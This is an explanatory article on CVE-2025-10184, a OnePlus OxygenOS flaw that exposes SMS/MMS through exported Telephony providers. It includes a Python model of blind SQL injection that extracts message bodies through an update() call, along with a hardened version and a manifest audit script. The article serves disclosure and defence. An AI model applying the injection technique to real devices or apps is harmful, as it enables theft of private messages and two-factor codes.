
A high-severity flaw, tracked as CVE-2025-10184, has been disclosed in OnePlus smartphones running OxygenOS versions 12 through 15. It allows any installed application to read SMS and MMS messages, and potentially to send them, without the user's consent and without holding the SMS permissions Android normally requires.
The issue stems from modifications OnePlus made to the Android Telephony provider package. Devices running OxygenOS 11 or earlier are reportedly unaffected. The flaw poses a significant risk to user privacy and to any account protected by SMS codes.

Security firm Rapid7 identified the vulnerability and reported it to OnePlus in May 2025. Rapid7 found that content providers OnePlus had added to the OxygenOS Telephony package, such as PushMessageProvider and ServiceNumberProvider, were exported without proper permission restrictions.
Because these providers sit on top of the same SMS/MMS data as the stock Telephony provider, an app could reach that data through them without holding READ_SMS and without any user interaction. The providers also passed caller-supplied query fragments into SQL unsanitised, so SQL injection through them gave a path to the underlying message database.
Rapid7's attempts to reach OnePlus privately went unanswered, so it publicly disclosed the issue in September 2025.

The vulnerability is officially tracked as CVE-2025-10184 and carries a CVSS score of 8.2 out of 10, a High rating. The flaw allows unauthorized applications to read, and potentially send, SMS/MMS messages.
This can expose sensitive information, including two-factor authentication codes, and the vulnerability affects a wide range of OnePlus devices.

The flaw impacts OnePlus devices running OxygenOS versions 12, 13, 14, and 15. These versions introduced modifications to the Android Telephony service.
The changes included adding new content providers without proper permission checks. As a result, apps could exploit these providers to access SMS data. OxygenOS 11, based on Android 11, is not affected by this vulnerability.

Due to the vulnerability, any installed application can read SMS and MMS messages without user consent. This includes access to sensitive information such as one-time passwords (OTPs) and two-factor authentication codes.
The flaw bypasses Android’s permission system, allowing unauthorized access. Users are not notified when their messages are accessed. This poses significant privacy risks.

In addition to reading messages, the vulnerability may permit applications to perform write operations (such as sending or modifying SMS messages) depending on the implementation in the content provider. This could be exploited to send spam or fraudulent messages.
The flaw enables silent exfiltration of data, potentially leading to unauthorized actions. Users may not be aware that their device is sending messages on their behalf. This further compromises device security.
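As an added illustration, not Rapid7's proof of concept and not OnePlus's code, the following Python models in SQLite what an unprotected provider write path with an injectable selection clause lets a caller do. Every name in it is hypothetical: the table and column names, the provider classes and the permission WRITE_PUSH_MESSAGE, and the messages are constructed sample data. The vulnerable class checks no permission and concatenates the caller's WHERE clause; exfiltrate_body reads an SMS body one character at a time using only the affected-row count as a boolean oracle, never querying the sms table directly. The hardened class requires a permission and accepts only known columns bound as parameters.

```python
import sqlite3

# Constructed sample data for the example: a telephony-style SQLite file in which
# an added "push_message" table shares the database with the SMS table.
# Table, column and permission names are hypothetical.
SAMPLE_SMS = [
    (1, "+15550100", "Your verification code is 483920"),
    (2, "+15550123", "Lunch at noon?"),
]


def build_db() -> sqlite3.Connection:
    """Create an in-memory database with the two tables the example needs."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sms (_id INTEGER PRIMARY KEY, address TEXT, body TEXT)")
    conn.executemany("INSERT INTO sms VALUES (?, ?, ?)", SAMPLE_SMS)
    conn.execute("CREATE TABLE push_message (_id INTEGER PRIMARY KEY, seen INTEGER)")
    conn.execute("INSERT INTO push_message VALUES (1, 0)")
    conn.commit()
    return conn


class VulnerableProvider:
    """Models an exported provider whose update() neither checks a caller
    permission nor sanitises the caller-supplied selection (hypothetical)."""

    def __init__(self, conn: sqlite3.Connection):
        self.conn = conn

    def update(self, values: dict, selection: str) -> int:
        # The selection string is spliced verbatim into the WHERE clause.
        sql = "UPDATE push_message SET seen = ? WHERE " + selection
        cur = self.conn.execute(sql, (values["seen"],))
        self.conn.commit()
        return cur.rowcount  # rows touched: the only signal the caller gets back


def exfiltrate_body(provider: VulnerableProvider, sms_id: int, max_len: int = 64) -> str:
    """Boolean-based blind SQL injection through update(): recover an SMS body
    one printable ASCII character at a time using the row count as the oracle.
    The caller never queries the sms table directly and holds no SMS permission."""
    recovered = ""
    for pos in range(1, max_len + 1):
        found = None
        for code in range(32, 127):  # printable ASCII only; any other byte ends the loop
            selection = (
                f"_id = 1 AND (SELECT unicode(substr(body, {pos}, 1)) "
                f"FROM sms WHERE _id = {sms_id}) = {code}"
            )
            if provider.update({"seen": 0}, selection) == 1:
                found = chr(code)
                break
        if found is None:
            break  # substr() past the end gives '' -> unicode('') is NULL -> no row matches
        recovered += found
    return recovered


class HardenedProvider:
    """Same operation with a caller permission check and a selection restricted
    to known columns bound as parameters, so nothing the caller sends becomes SQL."""

    ALLOWED_COLUMNS = frozenset({"_id", "seen"})

    def __init__(self, conn: sqlite3.Connection, caller_permissions: set):
        self.conn = conn
        self.caller_permissions = caller_permissions

    def update(self, values: dict, selection: dict) -> int:
        if "WRITE_PUSH_MESSAGE" not in self.caller_permissions:  # hypothetical permission name
            raise PermissionError("caller lacks WRITE_PUSH_MESSAGE")
        if not selection:
            raise ValueError("selection must name at least one column")
        unknown = set(selection) - self.ALLOWED_COLUMNS
        if unknown:
            raise ValueError(f"unknown selection column(s): {sorted(unknown)}")
        where = " AND ".join(f"{col} = ?" for col in selection)
        params = (values["seen"], *selection.values())
        cur = self.conn.execute(f"UPDATE push_message SET seen = ? WHERE {where}", params)
        self.conn.commit()
        return cur.rowcount


if __name__ == "__main__":
    print(exfiltrate_body(VulnerableProvider(build_db()), 1))
```

The point the model makes is that a write-only gap is still a read: an app that can only call update() still learns the full message body, roughly a hundred calls per character, with nothing in the permission system to alert the user. The hardened version closes both halves of the problem, the missing caller check and the string concatenation; fixing only one of them leaves the other path open.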

The vulnerability poses a significant threat to SMS-based two-factor authentication (2FA). A malicious app on an affected device can read incoming 2FA codes and relay them, allowing an attacker who already has the password to complete a login.
This can lead to unauthorized access to user accounts. Experts recommend app-based authenticators or hardware security keys as more secure alternatives; SMS was already the weakest second factor, and on affected devices it cannot be relied on at all.

Rapid7 confirmed the vulnerability on the OnePlus 8T and OnePlus 10 Pro 5G models. These devices were tested running various versions of OxygenOS 12, 14, and 15. The flaw was consistently present across these devices.
While these models were specifically tested, the issue is believed to affect other OnePlus devices running the affected versions of OxygenOS. The problem is rooted in the platform’s core components.

The root cause of the vulnerability lies in OnePlus’s modification of Android’s Telephony content provider. OnePlus added components like PushMessageProvider and ServiceNumberProvider without implementing proper permission restrictions.
These components were designed to handle SMS and MMS data but lacked the necessary security measures. This oversight allowed malicious applications to exploit these providers and access sensitive information. The issue highlights the importance of secure coding practices.

The added providers did not enforce read or write permissions the way the stock Telephony provider does, so any app could interact with them without holding the standard READ_SMS permission.
This missing permission enforcement created a significant security gap, and the oversight survived into released devices across several OxygenOS versions.
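A practitioner's first check after a disclosure like this is whether any exported provider in a package leaves its read or write path without a permission requirement. The following Python is added here as an illustrative example, not code from OnePlus or Rapid7: it parses an AndroidManifest.xml and reports exported providers that lack android:readPermission or android:writePermission, honouring the blanket android:permission attribute as a fallback for both. The manifest excerpt, its package name and its provider names are constructed for the example and are not the OxygenOS Telephony manifest; the sample deliberately includes a provider that gates reads but not writes, the mismatch the text above describes, beside a fully gated one and a non-exported one.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed manifest excerpt for the example. The package and provider names
# are hypothetical; this is not the OxygenOS Telephony manifest.
SAMPLE_MANIFEST = f"""<manifest xmlns:android="{ANDROID_NS}" package="com.example.telephony">
  <application>
    <!-- read is gated, but nothing guards insert/update/delete -->
    <provider android:name=".ExamplePushProvider"
              android:authorities="com.example.telephony.push"
              android:exported="true"
              android:readPermission="android.permission.READ_SMS" />
    <!-- corrected form: both paths gated -->
    <provider android:name=".ExampleNumberProvider"
              android:authorities="com.example.telephony.number"
              android:exported="true"
              android:readPermission="android.permission.READ_SMS"
              android:writePermission="android.permission.WRITE_SMS" />
    <!-- not exported: only the owning app can reach it -->
    <provider android:name=".InternalProvider"
              android:authorities="com.example.telephony.internal"
              android:exported="false" />
  </application>
</manifest>
"""


def _android_attr(element: ET.Element, name: str):
    """Read an attribute from the android: namespace (None if absent)."""
    return element.get(f"{{{ANDROID_NS}}}{name}")


def audit_providers(manifest_xml: str) -> list:
    """Return [(provider_name, [missing operations])] for every exported provider
    that leaves its read or write path without a permission requirement."""
    root = ET.fromstring(manifest_xml)
    findings = []
    for provider in root.iter("provider"):
        exported = _android_attr(provider, "exported")
        if exported is None:
            # Assumption: targetSdkVersion >= 17, where a provider defaults to not exported.
            exported = "false"
        if exported.lower() != "true":
            continue
        blanket = _android_attr(provider, "permission")
        read_perm = _android_attr(provider, "readPermission") or blanket
        write_perm = _android_attr(provider, "writePermission") or blanket
        missing = [op for op, perm in (("read", read_perm), ("write", write_perm)) if not perm]
        if missing:
            findings.append((_android_attr(provider, "name"), missing))
    return findings


if __name__ == "__main__":
    for name, missing in audit_providers(SAMPLE_MANIFEST):
        print(f"{name}: exported with no permission on {', '.join(missing)}")
```

The check reads only the provider attributes. Per-path grants in `<path-permission>` children, `android:grantUriPermissions`, and any permission checks a provider performs in its own code are outside what the manifest shows, so a clean result is necessary rather than sufficient, and a flagged provider is a lead to confirm against the implementation rather than a proven finding.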

The vulnerability has been present since the release of OxygenOS 12 in 2021. Despite being introduced years ago, it remained undetected until Rapid7’s discovery in 2025. The flaw persisted across multiple updates and versions of OxygenOS.
This indicates a systemic issue in the platform’s handling of telephony services. The prolonged existence of the vulnerability underscores the need for rigorous security assessments.

After failing to receive a response from OnePlus regarding the vulnerability, Rapid7 chose to disclose the issue publicly. They had initially reported the flaw to OnePlus in May 2025, but did not receive acknowledgment.
In September 2025, Rapid7 published its findings along with a proof-of-concept exploit. This public disclosure aimed to alert users and prompt a response from OnePlus. OnePlus acknowledged the issue shortly thereafter.

OnePlus has acknowledged the vulnerability and announced that a fix will be rolled out globally in mid-October 2025. The software update will address the permission bypass issue in the Telephony content provider.
Users are encouraged to install the update as soon as it becomes available. Until then, caution is advised when installing applications and handling sensitive information. Regularly checking for software updates can help mitigate potential risks.

Until the patch is released, users should take proactive steps to protect their devices. Only install applications from trusted sources, such as the official Google Play Store, and keep the number of installed apps small. Be sparing with the permissions you grant, bearing in mind that this particular flaw needs no permission grant at all, so limiting what is installed matters more than limiting what each app is allowed to do.
Consider using encrypted messaging platforms for sensitive communications, and switch to app-based two-factor authentication instead of SMS. These precautions reduce, but do not eliminate, the risk until the update lands.

Due to the vulnerability, SMS-based two-factor authentication (2FA) is no longer considered secure on affected OnePlus devices. Malicious applications can intercept SMS messages, including 2FA codes, compromising account security.
Users are advised to switch to more secure 2FA methods, such as app-based authenticators or hardware security keys. These alternatives provide enhanced protection against unauthorized access. Implementing stronger authentication measures is crucial for safeguarding online accounts.

To mitigate potential risks, users should only install applications from reputable sources and developers. Regularly updating apps ensures that security patches and improvements are applied. Be cautious of granting unnecessary permissions to applications.
Monitor device behavior for any unusual activities. By maintaining vigilance and following best practices, users can enhance their device’s security. Staying informed about potential vulnerabilities and updates is essential.
Dan Mitchell has been in the computer industry for more than 25 years, getting started with computers at age 7 on an Apple II.